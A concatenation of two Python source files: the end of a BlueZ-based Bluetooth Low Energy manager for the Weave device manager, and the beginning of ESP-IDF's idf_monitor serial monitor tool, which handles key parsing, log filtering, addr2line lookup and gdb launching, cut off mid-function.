traceback.print_exc()
finally:
self.Gmainloop.quit()
def setInputHook(self, hookFunc):
"""Set the PyOS_InputHook to call the specific function."""
hookFunctionType = CFUNCTYPE(None)
self.hookFuncPtr = hookFunctionType(hookFunc)
pyos_inputhook_ptr = c_void_p.in_dll(pythonapi, "PyOS_InputHook")
# save the original so that on del we can revert it back to the way it was.
self.orig_input_hook = cast(pyos_inputhook_ptr.value, PYFUNCTYPE(c_int))
# set the new hook. readLine will call this periodically as it polls for input.
pyos_inputhook_ptr.value = cast(self.hookFuncPtr, c_void_p).value
def runIdleLoop(self, **kwargs):
time.sleep(0)
pass
def devMgrCB(self):
self.runLoopUntil(self.runIdleLoop)
def readlineCB(self):
self.runLoopUntil(self.runIdleLoop)
if self.orig_input_hook:
self.orig_input_hook()
def scan_connect(self, line):
""" API to perform both scan and connect operations in one call."""
args = self.ParseInputLine(line, "scan-connect")
if not args:
return False
if not self.adapter:
self.logger.info("use default adapter")
self.ble_adapter_select()
self.scan_quiet= args[1]
self.scan(line)
if self.target:
return self.connect(args[2])
else:
self.logger.info("Failed to scan device named: " + args[2] + ". Connection skipped.")
return False
def dump_scan_result(self, device):
self.logger.info("{0:<10}{1}".format("Name =", device.Name))
self.logger.info("{0:<10}{1}".format("ID =", device.device_id))
self.logger.info("{0:<10}{1}".format("RSSI =", device.RSSI))
self.logger.info("{0:<10}{1}".format("address =", device.Address))
self.logger.info("ADV data: " + ("".join([str(i) for i in dict(device.ServiceData).keys()])) if device.ServiceData else '')
self.logger.info("")
def scan_bg_implementation(self, **kwargs):
self.adapter.clear_adapter()
with self.weave_queue.mutex:
self.weave_queue.queue.clear()
self.adapter.adapter_bg_scan(True)
found = False
identifier = kwargs['identifier']
timeout = kwargs['timeout'] + time.time()
while time.time() < timeout:
self.peripheral_list = self.adapter.find_devices([weave_service, weave_service_short, chromecast_setup_service, chromecast_setup_service_short])
for device in self.peripheral_list:
try:
if not self.scan_quiet:
# display all scanned results
self.dump_scan_result(device)
if device.Name == identifier or str(device.Address).upper() == str(identifier.upper()):
if self.scan_quiet:
# only display the scanned target's info when quiet
self.dump_scan_result(device)
self.target = device
found = True
break
except:
pass
if found:
break
time.sleep(bleIdleDelta)
self.adapter.adapter_bg_scan(False)
def scan(self, line):
args = self.ParseInputLine(line, "scan")
if not args:
return False
self.target = None
if not self.adapter:
self.logger.info("use default adapter")
self.ble_adapter_select()
del self.peripheral_list[:]
self.scan_quiet= args[1]
self.runLoopUntil(self.scan_bg_implementation, timeout=args[0], identifier=args[2])
return True
def weaveServieCharConnect(self):
gatt_dic={'services': [weave_service, weave_service_short], 'chars': [weave_tx, weave_rx]}
self.service = self.target.service_discover(gatt_dic)
if self.service is None:
self.logger.info("weave service cannot be found")
return False
self.rx = self.service.find_characteristic(weave_rx)
if self.rx is None:
self.logger.info("weave rx char cannot be found")
return False
self.tx = self.service.find_characteristic(weave_tx)
if self.tx is None:
self.logger.info("weave tx char cannot be found")
self.connect_state = False
return False
return True
def connect_bg_implementation(self, **kwargs):
self.connect_state = False
if self.adapter is None:
self.logger.info("adapter is not configured")
return
self.target.device_register_signal()
self.target.device_bg_connect(True)
if self.weaveServieCharConnect():
self.logger.info("connect success")
self.connect_state = True
else:
self.logger.info("connect fail")
self.connect_state = False
def disconnect_bg_implementation(self, **kwargs):
if self.target:
self.target.device_bg_connect(False)
if self.tx:
self.tx.destroy()
self.tx = None
if self.rx:
self.rx.destroy()
self.rx = None
if self.service:
self.service.destroy()
self.service = None
def connect(self, identifier):
found = False
self.logger.info("trying to connect to " + identifier)
for p in self.peripheral_list:
p_id = str(p.device_id)
p_name = str(p.Name)
p_address = str(p.Address)
self.logger.debug(p_id + " vs " + str(identifier))
self.logger.debug(p_name + " vs " + str(identifier))
self.logger.debug(p_address + " vs " + str(identifier))
if p_id == str(identifier) or p_name == str(identifier) or p_address.upper() == str(identifier).upper():
self.target = p
found = True
break
if found:
self.runLoopUntil(self.connect_bg_implementation, identifier = identifier, timeout=bleConnectTimeoutSec)
if self.connect_state:
return True
else:
return False
else:
print("device cannot be found")
return False
def disconnect(self):
self.runLoopUntil(self.disconnect_bg_implementation)
for i in range(2):
n = gc.collect()
self.logger.debug("Unreached objects: %d", n)
self.logger.debug("Final Garbage:")
self.logger.debug(pprint.pformat(gc.garbage))
def WriteCharactertisticSuccessCB(self, *args):
self.logger.debug("write complete")
if self.devMgr:
txEvent = BleTxEvent(charId=self.charId_tx, svcId=self.svcId_tx, status=True)
self.weave_queue.put(txEvent)
self.devMgr.DriveBleIO()
def WriteCharactertisticErrorCB(self, *args):
self.logger.debug("write fail, error:" + repr(args))
if self.devMgr:
txEvent = BleTxEvent(charId=self.charId_tx, svcId=self.svcId_tx, status=False)
self.weave_queue.put(txEvent)
self.devMgr.DriveBleIO()
def WriteBleCharacteristic(self, connObj, svcId, charId, buffer, length):
self.logger.debug("write start")
result = False
if self.target and self.target.Connected:
converted_data = WeaveUtility.VoidPtrToByteArray(buffer, length)
self.charId_tx = bytearray(uuid.UUID(str(VoidPtrToUUIDString(charId, 16))).bytes)
self.svcId_tx = bytearray(uuid.UUID(str(VoidPtrToUUIDString(svcId, 16))).bytes)
self.tx.WriteValue(dbus.Array([dbus.Byte(i) for i in converted_data], 'y'),
options="",
reply_handler=self.WriteCharactertisticSuccessCB,
error_handler=self.WriteCharactertisticErrorCB,
timeout=bleWriteCharacteristicTimeoutSec)
result = True
else:
self.logger.warning("WARNING: peripheral is no longer connected.")
return result
def receivedNotificationCB(self, data):
self.logger.debug("received data")
bytes = bytearray(data)
if self.devMgr:
rxEvent = BleRxEvent(charId=self.charId_rx, svcId=self.svcId_rx, buffer=bytes)
self.weave_queue.put(rxEvent)
self.devMgr.DriveBleIO()
def subscribeSuccessCb(self, *args):
self.logger.debug("subscribe complete")
if self.rx.Notifying:
success = True
else:
success = False
operation = BleSubscribeOperation_Subscribe
if self.devMgr:
subscribeEvent = BleSubscribeEvent(charId=self.charId_rx,
svcId=self.svcId_rx,
status=success,
operation=operation)
self.weave_queue.put(subscribeEvent)
self.devMgr.DriveBleIO()
def subscribeErrorCb(self, *args):
self.logger.error("subscribe fail, error:" + repr(args))
success = False
operation = BleSubscribeOperation_Subscribe
if self.devMgr:
subscribeEvent = BleSubscribeEvent(charId=self.charId_rx,
svcId=self.svcId_rx,
status=success,
operation=operation)
self.weave_queue.put(subscribeEvent)
self.devMgr.DriveBleIO()
def unsubscribeSuccessCb(self, *args):
self.logger.debug("unsubscribe complete")
success = True
operation = BleSubscribeOperation_Unsubscribe
if self.devMgr:
subscribeEvent = BleSubscribeEvent(charId=self.charId_rx,
svcId=self.svcId_rx,
status=success,
operation=operation)
self.weave_queue.put(subscribeEvent)
self.devMgr.DriveBleIO()
def unsubscribeErrorCb(self, *args):
self.logger.error("unsubscribe fail, error:" + repr(args))
success = False
operation = BleSubscribeOperation_Unsubscribe
if self.devMgr:
subscribeEvent = BleSubscribeEvent(charId=self.charId_rx,
svcId=self.svcId_rx,
status=success,
operation=operation)
self.weave_queue.put(subscribeEvent)
self.devMgr.DriveBleIO()
def SubscribeBleCharacteristic(self, connObj, svcId, charId, subscribe):
result = False
self.charId_rx = bytearray(uuid.UUID(VoidPtrToUUIDString(charId, 16)).bytes)
self.svcId_rx = bytearray(uuid.UUID(str(VoidPtrToUUIDString(svcId, 16))).bytes)
if self.target and self.target.Connected:
try:
if subscribe:
self.logger.debug("try to subscribe")
self.rx.StartNotify(cbfunct=self.receivedNotificationCB,
reply_handler=self.subscribeSuccessCb,
error_handler=self.subscribeErrorCb,
timeout=bleSubscribeTimeoutSec)
else:
self.logger.debug("try to unsubscribe")
self.rx.StopNotify(reply_handler=self.unsubscribeSuccessCb,
error_handler=self.unsubscribeErrorCb,
timeout=bleSubscribeTimeoutSec)
except:
self.logger.debug(traceback.format_exc())
self.logger.debug("(un)subscribe error")
result = True
else:
self.logger.warning("WARNING: peripheral is no longer connected.")
return result
def GetBleEvent(self):
""" Called by WeaveDeviceMgr.py on behalf of Weave to retrieve a queued message."""
if not self.weave_queue.empty():
ev = self.weave_queue.get()
if isinstance(ev, BleRxEvent):
eventStruct = BleRxEventStruct.fromBleRxEvent(ev)
return cast( pointer(eventStruct), c_void_p).value
elif isinstance(ev, BleTxEvent):
eventStruct = BleTxEventStruct.fromBleTxEvent(ev)
return cast( pointer(eventStruct), c_void_p).value
elif isinstance(ev, BleSubscribeEvent):
eventStruct = BleSubscribeEventStruct.fromBleSubscribeEvent(ev)
return cast( pointer(eventStruct), c_void_p).value
elif isinstance(ev, BleDisconnectEvent):
eventStruct = BleDisconnectEventStruct.fromBleDisconnectEvent(ev)
return cast( pointer(eventStruct), c_void_p).value
return None
def ble_debug_log(self, line):
args = self.ParseInputLine(line)
if int(args[0]) == 1:
self.logger.setLevel(logging.DEBUG)
self.logger.debug("current logging level is debug")
else:
self.logger.setLevel(logging.INFO)
self.logger.info("current logging level is info")
return True
def CloseBle(self, connObj):
""" Called by Weave to close the BLE connection."""
        # Workaround: disconnect is intentionally not called here because it can hang during close;
        # call disconnect explicitly after close instead. This still needs a proper fix.
# self.disconnect()
if self.devMgr:
dcEvent = BleDisconnectEvent(BLE_ERROR_REMOTE_DEVICE_DISCONNECTED)
self.weave_queue.put(dcEvent)
self.devMgr.DriveBleIO()
return True
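# Illustrative end-to-end call sequence for BluezManager (a sketch only: the adapter
# address and device name are hypothetical, and the exact scan line syntax is whatever
# ParseInputLine expects -- the format shown below is an assumption):
#
#   mgr = BluezManager(devMgr)                      # devMgr: the Weave device manager instance
#   mgr.ble_adapter_print()                         # e.g. "adapter 0 = AA:BB:CC:DD:EE:FF"
#   mgr.ble_adapter_select("AA:BB:CC:DD:EE:FF")     # omit the argument to use the first adapter
#   mgr.scan("-t 15 MY-WEAVE-DEVICE")               # populates self.peripheral_list
#   mgr.connect("MY-WEAVE-DEVICE")                  # accepts a device name, device id, or BLE address
#   mgr.disconnect()                                # tears down the GATT objects and the link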
|
idf_monitor.py
|
#!/usr/bin/env python
#
# esp-idf serial output monitor tool. Does some helpful things:
# - Looks up hex addresses in ELF file with addr2line
# - Reset ESP32 via serial RTS line (Ctrl-T Ctrl-R)
# - Run flash build target to rebuild and flash entire project (Ctrl-T Ctrl-F)
# - Run app-flash build target to rebuild and flash app only (Ctrl-T Ctrl-A)
# - If gdbstub output is detected, gdb is automatically loaded
#
# Copyright 2015-2016 Espressif Systems (Shanghai) PTE LTD
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Contains elements taken from miniterm "Very simple serial terminal" which
# is part of pySerial. https://github.com/pyserial/pyserial
# (C)2002-2015 Chris Liechti <cliechti@gmx.net>
#
# Originally released under BSD-3-Clause license.
#
from __future__ import print_function, division
from __future__ import unicode_literals
from builtins import chr
from builtins import object
from builtins import bytes
import subprocess
import argparse
import codecs
import datetime
import re
import os
try:
import queue
except ImportError:
import Queue as queue
import shlex
import time
import sys
import serial
import serial.tools.list_ports
import serial.tools.miniterm as miniterm
import threading
import ctypes
import types
from distutils.version import StrictVersion
from io import open
import textwrap
key_description = miniterm.key_description
# Control-key characters
CTRL_A = '\x01'
CTRL_B = '\x02'
CTRL_F = '\x06'
CTRL_H = '\x08'
CTRL_R = '\x12'
CTRL_T = '\x14'
CTRL_Y = '\x19'
CTRL_P = '\x10'
CTRL_X = '\x18'
CTRL_L = '\x0c'
CTRL_RBRACKET = '\x1d' # Ctrl+]
# Command parsed from console inputs
CMD_STOP = 1
CMD_RESET = 2
CMD_MAKE = 3
CMD_APP_FLASH = 4
CMD_OUTPUT_TOGGLE = 5
CMD_TOGGLE_LOGGING = 6
CMD_ENTER_BOOT = 7
# ANSI terminal codes (if changed, regular expressions in LineMatcher need to be updated)
ANSI_RED = '\033[1;31m'
ANSI_YELLOW = '\033[0;33m'
ANSI_NORMAL = '\033[0m'
def color_print(message, color):
""" Print a message to stderr with colored highlighting """
sys.stderr.write("%s%s%s\n" % (color, message, ANSI_NORMAL))
def yellow_print(message):
color_print(message, ANSI_YELLOW)
def red_print(message):
color_print(message, ANSI_RED)
__version__ = "1.1"
# Tags for tuples in queues
TAG_KEY = 0
TAG_SERIAL = 1
TAG_SERIAL_FLUSH = 2
TAG_CMD = 3
# regex matches a potential PC value (0x4xxxxxxx)
MATCH_PCADDR = re.compile(r'0x4[0-9a-f]{7}', re.IGNORECASE)
DEFAULT_TOOLCHAIN_PREFIX = "xtensa-esp32-elf-"
DEFAULT_PRINT_FILTER = ""
class StoppableThread(object):
"""
Provide a Thread-like class which can be 'cancelled' via a subclass-provided
cancellation method.
Can be started and stopped multiple times.
Isn't an instance of type Thread because Python Thread objects can only be run once
"""
def __init__(self):
self._thread = None
@property
def alive(self):
"""
Is 'alive' whenever the internal thread object exists
"""
return self._thread is not None
def start(self):
if self._thread is None:
self._thread = threading.Thread(target=self._run_outer)
self._thread.start()
def _cancel(self):
pass # override to provide cancellation functionality
def run(self):
pass # override for the main thread behaviour
def _run_outer(self):
try:
self.run()
finally:
self._thread = None
def stop(self):
if self._thread is not None:
old_thread = self._thread
self._thread = None
self._cancel()
old_thread.join()
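# A minimal (hypothetical) StoppableThread subclass, sketched here to show the intended
# contract: run() loops while self.alive and blocks on something that _cancel() can
# interrupt, so stop() can join the thread promptly. The names below are illustrative only.
#
#   class TickerThread(StoppableThread):
#       def __init__(self):
#           super(TickerThread, self).__init__()
#           self._stop_event = threading.Event()
#       def run(self):
#           self._stop_event.clear()
#           while self.alive and not self._stop_event.wait(1.0):
#               print("tick")          # periodic work goes here
#       def _cancel(self):
#           self._stop_event.set()     # unblocks wait() so the loop exits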
class ConsoleReader(StoppableThread):
""" Read input keys from the console and push them to the queue,
until stopped.
"""
def __init__(self, console, event_queue, cmd_queue, parser, test_mode):
super(ConsoleReader, self).__init__()
self.console = console
self.event_queue = event_queue
self.cmd_queue = cmd_queue
self.parser = parser
self.test_mode = test_mode
def run(self):
self.console.setup()
try:
while self.alive:
try:
if os.name == 'nt':
                        # Windows kludge: the console.cancel() method doesn't seem
                        # to unblock getkey() on the Windows implementation, so we
                        # only call getkey() if we know there's a key waiting for us.
import msvcrt
while not msvcrt.kbhit() and self.alive:
time.sleep(0.1)
if not self.alive:
break
elif self.test_mode:
                        # In testing mode stdin is connected to a PTY but is not used for any input. For a PTY,
                        # cancelling via fcntl.ioctl does not work and self.console.getkey() would hang,
                        # therefore we avoid calling it.
while self.alive:
time.sleep(0.1)
break
c = self.console.getkey()
except KeyboardInterrupt:
c = '\x03'
if c is not None:
ret = self.parser.parse(c)
if ret is not None:
(tag, cmd) = ret
# stop command should be executed last
if tag == TAG_CMD and cmd != CMD_STOP:
self.cmd_queue.put(ret)
else:
self.event_queue.put(ret)
finally:
self.console.cleanup()
def _cancel(self):
if os.name == 'posix' and not self.test_mode:
# this is the way cancel() is implemented in pyserial 3.3 or newer,
# older pyserial (3.1+) has cancellation implemented via 'select',
# which does not work when console sends an escape sequence response
#
# even older pyserial (<3.1) does not have this method
#
# on Windows there is a different (also hacky) fix, applied above.
#
# note that TIOCSTI is not implemented in WSL / bash-on-Windows.
# TODO: introduce some workaround to make it work there.
#
# Note: This would throw exception in testing mode when the stdin is connected to PTY.
import fcntl
import termios
fcntl.ioctl(self.console.fd, termios.TIOCSTI, b'\0')
class ConsoleParser(object):
def __init__(self, eol="CRLF"):
self.translate_eol = {
"CRLF": lambda c: c.replace("\n", "\r\n"),
"CR": lambda c: c.replace("\n", "\r"),
"LF": lambda c: c.replace("\r", "\n"),
}[eol]
self.menu_key = CTRL_T
self.exit_key = CTRL_RBRACKET
self._pressed_menu_key = False
def parse(self, key):
ret = None
if self._pressed_menu_key:
ret = self._handle_menu_key(key)
elif key == self.menu_key:
self._pressed_menu_key = True
elif key == self.exit_key:
ret = (TAG_CMD, CMD_STOP)
else:
key = self.translate_eol(key)
ret = (TAG_KEY, key)
return ret
def _handle_menu_key(self, c):
ret = None
if c == self.exit_key or c == self.menu_key: # send verbatim
ret = (TAG_KEY, c)
elif c in [CTRL_H, 'h', 'H', '?']:
red_print(self.get_help_text())
elif c == CTRL_R: # Reset device via RTS
ret = (TAG_CMD, CMD_RESET)
elif c == CTRL_F: # Recompile & upload
ret = (TAG_CMD, CMD_MAKE)
elif c in [CTRL_A, 'a', 'A']: # Recompile & upload app only
# "CTRL-A" cannot be captured with the default settings of the Windows command line, therefore, "A" can be used
# instead
ret = (TAG_CMD, CMD_APP_FLASH)
elif c == CTRL_Y: # Toggle output display
ret = (TAG_CMD, CMD_OUTPUT_TOGGLE)
elif c == CTRL_L: # Toggle saving output into file
ret = (TAG_CMD, CMD_TOGGLE_LOGGING)
elif c == CTRL_P:
yellow_print("Pause app (enter bootloader mode), press Ctrl-T Ctrl-R to restart")
            # to quickly trigger the pause without pressing the menu key
ret = (TAG_CMD, CMD_ENTER_BOOT)
elif c in [CTRL_X, 'x', 'X']: # Exiting from within the menu
ret = (TAG_CMD, CMD_STOP)
else:
red_print('--- unknown menu character {} --'.format(key_description(c)))
self._pressed_menu_key = False
return ret
def get_help_text(self):
text = """\
--- idf_monitor ({version}) - ESP-IDF monitor tool
--- based on miniterm from pySerial
---
--- {exit:8} Exit program
--- {menu:8} Menu escape key, followed by:
--- Menu keys:
--- {menu:14} Send the menu character itself to remote
--- {exit:14} Send the exit character itself to remote
--- {reset:14} Reset target board via RTS line
--- {makecmd:14} Build & flash project
--- {appmake:14} Build & flash app only
--- {output:14} Toggle output display
--- {log:14} Toggle saving output into file
--- {pause:14} Reset target into bootloader to pause app via RTS line
--- {menuexit:14} Exit program
""".format(version=__version__,
exit=key_description(self.exit_key),
menu=key_description(self.menu_key),
reset=key_description(CTRL_R),
makecmd=key_description(CTRL_F),
appmake=key_description(CTRL_A) + ' (or A)',
output=key_description(CTRL_Y),
log=key_description(CTRL_L),
pause=key_description(CTRL_P),
menuexit=key_description(CTRL_X) + ' (or X)')
return textwrap.dedent(text)
def get_next_action_text(self):
text = """\
--- Press {} to exit monitor.
--- Press {} to build & flash project.
--- Press {} to build & flash app.
--- Press any other key to resume monitor (resets target).
""".format(key_description(self.exit_key),
key_description(CTRL_F),
key_description(CTRL_A))
return textwrap.dedent(text)
def parse_next_action_key(self, c):
ret = None
if c == self.exit_key:
ret = (TAG_CMD, CMD_STOP)
elif c == CTRL_F: # Recompile & upload
ret = (TAG_CMD, CMD_MAKE)
elif c in [CTRL_A, 'a', 'A']: # Recompile & upload app only
# "CTRL-A" cannot be captured with the default settings of the Windows command line, therefore, "A" can be used
# instead
ret = (TAG_CMD, CMD_APP_FLASH)
return ret
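# Illustrative mapping of key presses to parser results (derived from the code above,
# assuming the default CRLF end-of-line translation):
#
#   p = ConsoleParser()
#   p.parse('a')              # -> (TAG_KEY, 'a')
#   p.parse('\n')             # -> (TAG_KEY, '\r\n')       newline translated for CRLF
#   p.parse(CTRL_T)           # -> None                    menu key pressed, waiting for the next key
#   p.parse(CTRL_R)           # -> (TAG_CMD, CMD_RESET)    reset target via RTS
#   p.parse(CTRL_RBRACKET)    # -> (TAG_CMD, CMD_STOP)     exit the monitor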
class SerialReader(StoppableThread):
""" Read serial data from the serial port and push to the
event queue, until stopped.
"""
def __init__(self, serial, event_queue):
super(SerialReader, self).__init__()
self.baud = serial.baudrate
self.serial = serial
self.event_queue = event_queue
if not hasattr(self.serial, 'cancel_read'):
# enable timeout for checking alive flag,
# if cancel_read not available
self.serial.timeout = 0.25
def run(self):
if not self.serial.is_open:
self.serial.baudrate = self.baud
self.serial.rts = True # Force an RTS reset on open
self.serial.open()
self.serial.rts = False
self.serial.dtr = self.serial.dtr # usbser.sys workaround
try:
while self.alive:
data = self.serial.read(self.serial.in_waiting or 1)
if len(data):
self.event_queue.put((TAG_SERIAL, data), False)
finally:
self.serial.close()
def _cancel(self):
if hasattr(self.serial, 'cancel_read'):
try:
self.serial.cancel_read()
except Exception:
pass
class LineMatcher(object):
"""
Assembles a dictionary of filtering rules based on the --print_filter
argument of idf_monitor. Then later it is used to match lines and
determine whether they should be shown on screen or not.
"""
LEVEL_N = 0
LEVEL_E = 1
LEVEL_W = 2
LEVEL_I = 3
LEVEL_D = 4
LEVEL_V = 5
level = {'N': LEVEL_N, 'E': LEVEL_E, 'W': LEVEL_W, 'I': LEVEL_I, 'D': LEVEL_D,
'V': LEVEL_V, '*': LEVEL_V, '': LEVEL_V}
def __init__(self, print_filter):
self._dict = dict()
self._re = re.compile(r'^(?:\033\[[01];?[0-9]+m?)?([EWIDV]) \([0-9]+\) ([^:]+): ')
items = print_filter.split()
if len(items) == 0:
self._dict["*"] = self.LEVEL_V # default is to print everything
for f in items:
s = f.split(r':')
if len(s) == 1:
# specifying no warning level defaults to verbose level
lev = self.LEVEL_V
elif len(s) == 2:
if len(s[0]) == 0:
raise ValueError('No tag specified in filter ' + f)
try:
lev = self.level[s[1].upper()]
except KeyError:
raise ValueError('Unknown warning level in filter ' + f)
else:
raise ValueError('Missing ":" in filter ' + f)
self._dict[s[0]] = lev
def match(self, line):
try:
m = self._re.search(line)
if m:
lev = self.level[m.group(1)]
if m.group(2) in self._dict:
return self._dict[m.group(2)] >= lev
return self._dict.get("*", self.LEVEL_N) >= lev
except (KeyError, IndexError):
# Regular line written with something else than ESP_LOG*
# or an empty line.
pass
# We need something more than "*.N" for printing.
return self._dict.get("*", self.LEVEL_N) > self.LEVEL_N
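# Worked example of the filter rules (derived from the code above). With a print filter
# of "wifi:W mdns", lines tagged "wifi" are shown only at warning level or more severe,
# lines tagged "mdns" are shown at every level, and other tags are hidden because no
# "*" entry is present:
#
#   matcher = LineMatcher("wifi:W mdns")
#   matcher.match("W (1234) wifi: deauth received")   # True  (W is at the configured level)
#   matcher.match("I (1240) wifi: connected")         # False (I is more verbose than W)
#   matcher.match("D (1300) mdns: query sent")        # True  (mdns defaults to verbose)
#   matcher.match("I (1400) uart: some line")         # False (unknown tag and no "*" entry)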
class SerialStopException(Exception):
"""
This exception is used for stopping the IDF monitor in testing mode.
"""
pass
class Monitor(object):
"""
Monitor application main class.
This was originally derived from miniterm.Miniterm, but it turned out to be easier to write from scratch for this
purpose.
Main difference is that all event processing happens in the main thread, not the worker threads.
"""
def __init__(self, serial_instance, elf_file, print_filter, make="make", encrypted=False,
toolchain_prefix=DEFAULT_TOOLCHAIN_PREFIX, eol="CRLF"):
super(Monitor, self).__init__()
self.event_queue = queue.Queue()
self.cmd_queue = queue.Queue()
self.console = miniterm.Console()
if os.name == 'nt':
sys.stderr = ANSIColorConverter(sys.stderr, decode_output=True)
self.console.output = ANSIColorConverter(self.console.output)
self.console.byte_output = ANSIColorConverter(self.console.byte_output)
if StrictVersion(serial.VERSION) < StrictVersion('3.3.0'):
# Use Console.getkey implementation from 3.3.0 (to be in sync with the ConsoleReader._cancel patch above)
def getkey_patched(self):
c = self.enc_stdin.read(1)
if c == chr(0x7f):
c = chr(8) # map the BS key (which yields DEL) to backspace
return c
self.console.getkey = types.MethodType(getkey_patched, self.console)
        socket_mode = serial_instance.port.startswith("socket://") # testing hook - data from serial can make the monitor exit
self.serial = serial_instance
self.console_parser = ConsoleParser(eol)
self.console_reader = ConsoleReader(self.console, self.event_queue, self.cmd_queue, self.console_parser, socket_mode)
self.serial_reader = SerialReader(self.serial, self.event_queue)
self.elf_file = elf_file
if not os.path.exists(make):
self.make = shlex.split(make) # allow for possibility the "make" arg is a list of arguments (for idf.py)
else:
self.make = make
self.encrypted = encrypted
self.toolchain_prefix = toolchain_prefix
# internal state
self._last_line_part = b""
self._gdb_buffer = b""
self._pc_address_buffer = b""
self._line_matcher = LineMatcher(print_filter)
self._invoke_processing_last_line_timer = None
self._force_line_print = False
self._output_enabled = True
self._serial_check_exit = socket_mode
self._log_file = None
def invoke_processing_last_line(self):
self.event_queue.put((TAG_SERIAL_FLUSH, b''), False)
def main_loop(self):
self.console_reader.start()
self.serial_reader.start()
try:
while self.console_reader.alive and self.serial_reader.alive:
try:
item = self.cmd_queue.get_nowait()
except queue.Empty:
try:
item = self.event_queue.get(True, 0.03)
except queue.Empty:
continue
(event_tag, data) = item
if event_tag == TAG_CMD:
self.handle_commands(data)
elif event_tag == TAG_KEY:
try:
self.serial.write(codecs.encode(data))
except serial.SerialException:
pass # this shouldn't happen, but sometimes port has closed in serial thread
except UnicodeEncodeError:
pass # this can happen if a non-ascii character was passed, ignoring
elif event_tag == TAG_SERIAL:
self.handle_serial_input(data)
if self._invoke_processing_last_line_timer is not None:
self._invoke_processing_last_line_timer.cancel()
self._invoke_processing_last_line_timer = threading.Timer(0.1, self.invoke_processing_last_line)
self._invoke_processing_last_line_timer.start()
                    # If no further data is received in the next short period
                    # of time then the _invoke_processing_last_line_timer
                    # generates an event which will result in the finishing of
                    # the last line. This is a fix for handling lines sent
                    # without EOL.
elif event_tag == TAG_SERIAL_FLUSH:
self.handle_serial_input(data, finalize_line=True)
else:
raise RuntimeError("Bad event data %r" % ((event_tag,data),))
except SerialStopException:
sys.stderr.write(ANSI_NORMAL + "Stopping condition has been received\n")
finally:
try:
self.console_reader.stop()
self.serial_reader.stop()
self.stop_logging()
# Cancelling _invoke_processing_last_line_timer is not
# important here because receiving empty data doesn't matter.
self._invoke_processing_last_line_timer = None
except Exception:
pass
sys.stderr.write(ANSI_NORMAL + "\n")
def handle_serial_input(self, data, finalize_line=False):
sp = data.split(b'\n')
if self._last_line_part != b"":
# add unprocessed part from previous "data" to the first line
sp[0] = self._last_line_part + sp[0]
self._last_line_part = b""
if sp[-1] != b"":
# last part is not a full line
self._last_line_part = sp.pop()
for line in sp:
if line != b"":
if self._serial_check_exit and line == self.console_parser.exit_key.encode('latin-1'):
raise SerialStopException()
if self._force_line_print or self._line_matcher.match(line.decode(errors="ignore")):
self._print(line + b'\n')
self.handle_possible_pc_address_in_line(line)
self.check_gdbstub_trigger(line)
self._force_line_print = False
        # Now we have the last part (incomplete line) in _last_line_part. By
        # default we don't touch it and just wait for the arrival of the rest
        # of the line. But if after some time we still haven't received it, we
        # need to make a decision.
if self._last_line_part != b"":
if self._force_line_print or (finalize_line and self._line_matcher.match(self._last_line_part.decode(errors="ignore"))):
self._force_line_print = True
self._print(self._last_line_part)
self.handle_possible_pc_address_in_line(self._last_line_part)
self.check_gdbstub_trigger(self._last_line_part)
                # It is possible that the incomplete line cuts the PC address in
                # half. A small buffer is kept and will be used the next time
                # handle_possible_pc_address_in_line is invoked to avoid this problem.
                # MATCH_PCADDR matches 10 character long addresses. Therefore, we
                # keep the last 9 characters.
self._pc_address_buffer = self._last_line_part[-9:]
# GDB sequence can be cut in half also. GDB sequence is 7
# characters long, therefore, we save the last 6 characters.
self._gdb_buffer = self._last_line_part[-6:]
self._last_line_part = b""
# else: keeping _last_line_part and it will be processed the next time
# handle_serial_input is invoked
def handle_possible_pc_address_in_line(self, line):
line = self._pc_address_buffer + line
self._pc_address_buffer = b""
for m in re.finditer(MATCH_PCADDR, line.decode(errors="ignore")):
self.lookup_pc_address(m.group())
def __enter__(self):
""" Use 'with self' to temporarily disable monitoring behaviour """
self.serial_reader.stop()
self.console_reader.stop()
def __exit__(self, *args, **kwargs):
""" Use 'with self' to temporarily disable monitoring behaviour """
self.console_reader.start()
self.serial_reader.start()
def prompt_next_action(self, reason):
self.console.setup() # set up console to trap input characters
try:
red_print("--- {}".format(reason))
red_print(self.console_parser.get_next_action_text())
k = CTRL_T # ignore CTRL-T here, so people can muscle-memory Ctrl-T Ctrl-F, etc.
while k == CTRL_T:
k = self.console.getkey()
finally:
self.console.cleanup()
ret = self.console_parser.parse_next_action_key(k)
if ret is not None:
cmd = ret[1]
if cmd == CMD_STOP:
# the stop command should be handled last
self.event_queue.put(ret)
else:
self.cmd_queue.put(ret)
def run_make(self, target):
with self:
if isinstance(self.make, list):
popen_args = self.make + [target]
else:
popen_args = [self.make, target]
yellow_print("Running %s..." % " ".join(popen_args))
p = subprocess.Popen(popen_args)
try:
p.wait()
except KeyboardInterrupt:
p.wait()
if p.returncode != 0:
self.prompt_next_action("Build failed")
else:
self.output_enable(True)
def lookup_pc_address(self, pc_addr):
cmd = ["%saddr2line" % self.toolchain_prefix,
"-pfiaC", "-e", self.elf_file, pc_addr]
try:
translation = subprocess.check_output(cmd, cwd=".")
if b"?? ??:0" not in translation:
self._print(translation.decode(), console_printer=yellow_print)
except OSError as e:
red_print("%s: %s" % (" ".join(cmd), e))
def check_gdbstub_trigger(self, line):
line = self._gdb_buffer + line
self._gdb_buffer = b""
m = re.search(b"\\$(T..)#(..)", line) # look for a gdb "reason" for a break
if m is not None:
try:
chsum = sum(ord(bytes([p])) for p in m.group(1)) & 0xFF
calc_chsum = int(m.group(2), 16)
except ValueError:
return # payload wasn't valid hex digits
if chsum == calc_chsum:
self.run_gdb()
else:
red_print("Malformed gdb message... calculated checksum %02x received %02x" % (chsum, calc_chsum))
def run_gdb(self):
with self: # disable console control
sys.stderr.write(ANSI_NORMAL)
try:
cmd = ["%sgdb" % self.toolchain_prefix,
"-ex", "set serial baud %d" % self.serial.baudrate,
"-ex", "target remote %s" % self.serial.port,
"-ex", "interrupt", # monitor has already parsed the first 'reason' command, need a second
self.elf_file]
process = subprocess.Popen(cmd, cwd=".")
process.wait()
except OSError as e:
red_print("%s: %s" % (" ".join(cmd), e))
except KeyboardInterrupt:
pass # happens on Windows, maybe other OSes
finally:
try:
# on Linux, maybe other OSes, gdb sometimes seems to be alive even after wait() returns...
process.terminate()
except Exception:
pass
try:
